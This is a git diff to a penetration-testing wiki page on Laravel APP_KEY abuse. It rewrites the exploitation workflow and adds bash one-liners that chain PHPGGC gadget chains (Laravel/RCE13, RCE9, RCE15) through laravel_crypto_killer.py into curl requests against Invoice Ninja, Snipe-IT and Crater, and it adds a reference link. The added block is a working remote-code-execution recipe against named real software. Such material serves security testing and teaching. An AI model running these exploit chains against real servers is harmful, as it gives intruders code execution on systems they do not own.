diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index 118ee3e29..a558d24ed 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -64,10 +64,30 @@ The script transparently supports both CBC and GCM payloads and re-generates the | Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 | The exploitation workflow is always: -1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force) -2. Generate gadget with **PHPGGC** -3. `laravel_crypto_killer.py encrypt …` -4. Deliver payload through the vulnerable parameter/cookie → **RCE** +1. Obtain or brute-force the 32-byte `APP_KEY`. +2. Build a gadget chain with **PHPGGC** (for example `Laravel/RCE13`, `Laravel/RCE9` or `Laravel/RCE15`). +3. Encrypt the serialized gadget with **laravel_crypto_killer.py** and the recovered `APP_KEY`. +4. Deliver the ciphertext to the vulnerable `decrypt()` sink (route parameter, cookie, session …) to trigger **RCE**. + +Below are concise one-liners demonstrating the full attack path for each real-world CVE mentioned above: + +```bash +# Invoice Ninja ≤5 – /route/{hash} +php8.2 phpggc Laravel/RCE13 system id -b -f | \ + ./laravel_crypto_killer.py encrypt -k -v - | \ + xargs -I% curl "https://victim/route/%" + +# Snipe-IT ≤6 – XSRF-TOKEN cookie +php7.4 phpggc Laravel/RCE9 system id -b | \ + ./laravel_crypto_killer.py encrypt -k -v - > xsrf.txt +curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login + +# Crater – cookie-based session +php8.2 phpggc Laravel/RCE15 system id -b > payload.bin +./laravel_crypto_killer.py encrypt -k -v payload.bin --session_cookie= > forged.txt +curl -H "Cookie: laravel_session=; =$(cat forged.txt)" https://victim/login +``` + --- @@ -180,7 +200,8 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/ ## References -* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html) * [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) * [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) * [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)